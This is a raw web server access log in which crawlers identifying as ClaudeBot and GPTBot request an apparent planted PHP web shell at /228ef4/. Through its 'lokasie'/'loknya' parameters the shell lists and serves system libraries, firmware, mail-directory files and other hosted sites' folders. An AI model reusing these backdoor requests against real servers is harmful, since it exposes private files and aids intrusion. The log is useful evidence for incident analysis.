216.73.216.243 - - [07/Jul/2025:08:19:03 -0400] "GET /wp-includes/js/tinymce/plugins/media/ HTTP/1.1" 200 750 "https://www.ahmedkhalid.com/wp-includes/js/tinymce/plugins/media" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.243 - - [07/Jul/2025:08:19:04 -0400] "GET /228ef4/?loknya=%2Flib%2Ffirmware%2Famd HTTP/1.1" 200 8426 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.243 - - [07/Jul/2025:08:19:05 -0400] "GET /228ef4/index.php?lokasie=%2Fhome%2Fakhalid%2Fmail%2F.maliy%40nas-yemen_org%2Fdovecot-uidvalidity&loknya=%2Fhome%2Fakhalid%2Fmail%2F.maliy%40nas-yemen_org HTTP/1.1" 200 7889 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.243 - - [07/Jul/2025:08:19:04 -0400] "GET /228ef4/index.php?lokasie=%2Flib64%2Flibsodium.so.23.3.0&loknya=%2Flib64 HTTP/1.1" 200 153058 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.243 - - [07/Jul/2025:08:19:04 -0400] "GET /228ef4/?loknya=%2Fhome%2Fakhalid%2Flscache%2Fe%2F3 HTTP/1.1" 200 8489 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
20.171.207.219 - - [07/Jul/2025:08:19:04 -0400] "GET /228ef4/index.php?loknya=%2F.%2Fproc%2Fthread-self%2Froot%2Fusr%2Fshare%2Flocale%2Fund%2F HTTP/1.1" 200 8308 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.243 - - [07/Jul/2025:08:19:04 -0400] "GET /228ef4/index.php?lokasie=%2Flib64%2Flibhunspell-1.6.so.0.0.1&loknya=%2Flib64 HTTP/1.1" 200 220490 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.243 - - [07/Jul/2025:08:19:05 -0400] "GET /228ef4/?lokasie=%2Fusr%2Fbin%2Farpaname&loknya=%2Fusr%2Fbin HTTP/1.1" 200 11472 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.243 - - [07/Jul/2025:08:19:04 -0400] "GET /228ef4/?lokasie=%2Flib%2Ffirmware%2Fiwlwifi-QuZ-a0-jf-b0-66.ucode&loknya=%2Flib%2Ffirmware HTTP/1.1" 200 472470 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.243 - - [07/Jul/2025:08:19:04 -0400] "GET /228ef4/?lokasie=%2Flib%2Ffirmware%2Fiwlwifi-so-a0-jf-b0-74.ucode&loknya=%2Flib%2Ffirmware HTTP/1.1" 200 508364 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.243 - - [07/Jul/2025:08:19:05 -0400] "GET /228ef4/index.php?lokasie=%2Flib64%2Flibcryptsetup.so.12&loknya=%2Flib64 HTTP/1.1" 200 229321 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.243 - - [07/Jul/2025:08:19:03 -0400] "GET /228ef4/?lokasie=%2Flib%2Ffirmware%2Fiwlwifi-so-a0-gf4-a0-74.ucode&loknya=%2Flib%2Ffirmware HTTP/1.1" 200 586199 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.243 - - [07/Jul/2025:08:19:05 -0400] "GET /228ef4/index.php?lokasie=%2Flib64%2Flibkmod.so.2&loknya=%2Flib64 HTTP/1.1" 200 50551 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
47.82.60.13 - - [07/Jul/2025:08:19:06 -0400] "GET /wp-includes/js/tinymce/plugins/wpautoresize/audits HTTP/1.1" 301 795 "https://www.ahmedkhalid.com/wp-includes/js/tinymce/plugins/wpautoresize/audits" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.43"
216.73.216.243 - - [07/Jul/2025:08:19:04 -0400] "GET /228ef4/?lokasie=%2Flib%2Ffirmware%2Fiwlwifi-so-a0-gf-a0-77.ucode&loknya=%2Flib%2Ffirmware HTTP/1.1" 200 586783 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
20.171.207.219 - - [07/Jul/2025:08:19:06 -0400] "GET /228ef4/index.php?loknya=%2F.%2Fproc%2Fthread-self%2Froot%2Fusr%2Fshare%2Flocale%2Fsgn%2F HTTP/1.1" 200 8308 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.243 - - [07/Jul/2025:08:19:06 -0400] "GET /228ef4/?loknya=%2Fhome%2Fakhalid%2Fglobal-site%2Fwp-admin%2Fuser HTTP/1.1" 200 8600 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.243 - - [07/Jul/2025:08:19:06 -0400] "GET /228ef4/?lokasie=%2Flib%2Ffirmware%2Frt3070.bin&loknya=%2Flib%2Ffirmware HTTP/1.1" 200 10492 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.243 - - [07/Jul/2025:08:19:06 -0400] "GET /228ef4/?loknya=%2Fopt%2Falt%2Fphp74-imunify HTTP/1.1" 200 8115 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.243 - - [07/Jul/2025:08:19:06 -0400] "GET /228ef4/index.php?lokasie=%2Fbin%2Fuapi&loknya=%2Fbin HTTP/1.1" 200 8389 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.243 - - [07/Jul/2025:08:19:06 -0400] "GET /228ef4/?lokasie=%2Flib64%2Flibgstcodecparsers-1.0.so.0.1601.0&loknya=%2Flib64 HTTP/1.1" 200 124844 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
47.82.60.13 - - [07/Jul/2025:08:19:07 -0400] "GET /wp-includes/js/tinymce/plugins/wpautoresize/audits/ HTTP/1.1" 200 568 "https://www.ahmedkhalid.com/wp-includes/js/tinymce/plugins/wpautoresize/audits" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.43"
216.73.216.243 - - [07/Jul/2025:08:19:07 -0400] "GET /228ef4/?lokasie=%2Fhome%2Fakhalid%2Fdangroup.sa%2Fwp-content%2F902&loknya=%2Fhome%2Fakhalid%2Fdangroup.sa%2Fwp-content HTTP/1.1" 200 26209 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.243 - - [07/Jul/2025:08:19:06 -0400] "GET /228ef4/?loknya=%2Flib%2Ffirmware%2Fath10k HTTP/1.1" 200 8385 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.243 - - [07/Jul/2025:08:19:07 -0400] "GET /228ef4/index.php?lokasie=%2Flib64%2FlibodbcminiS.so.2.0.0&loknya=%2Flib64 HTTP/1.1" 200 10661 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.243 - - [07/Jul/2025:08:19:07 -0400] "GET /228ef4/?lokasie=%2Flib%2Fdracut%2Fdracut-init.sh&loknya=%2Flib%2Fdracut HTTP/1.1" 200 16399 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.243 - - [07/Jul/2025:08:19:06 -0400] "GET /228ef4/?loknya=%2Fhome%2Fakhalid%2Ffirst-gulf.com.sa%2Fwp-includes%2Fblocks HTTP/1.1" 200 12729 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
20.171.207.219 - - [07/Jul/2025:08:19:07 -0400] "GET /228ef4/index.php?loknya=%2F.%2Fproc%2Fthread-self%2Froot%2Fusr%2Fshare%2Flocale%2Ffiu%2FLC_MESSAGES HTTP/1.1" 200 8147 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.243 - - [07/Jul/2025:08:19:07 -0400] "GET /228ef4/?lokasie=%2Flib%2Ffirmware%2FTAS2XXX3F000.bin&loknya=%2Flib%2Ffirmware HTTP/1.1" 200 15645 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.243 - - [07/Jul/2025:08:19:07 -0400] "GET /228ef4/?loknya=%2Flib%2Ffirmware%2Fnetronome HTTP/1.1" 200 8760 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.243 - - [07/Jul/2025:08:19:07 -0400] "GET /228ef4/?loknya=%2Fvar%2Flog%2Falt-php72-newrelic HTTP/1.1" 200 8091 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
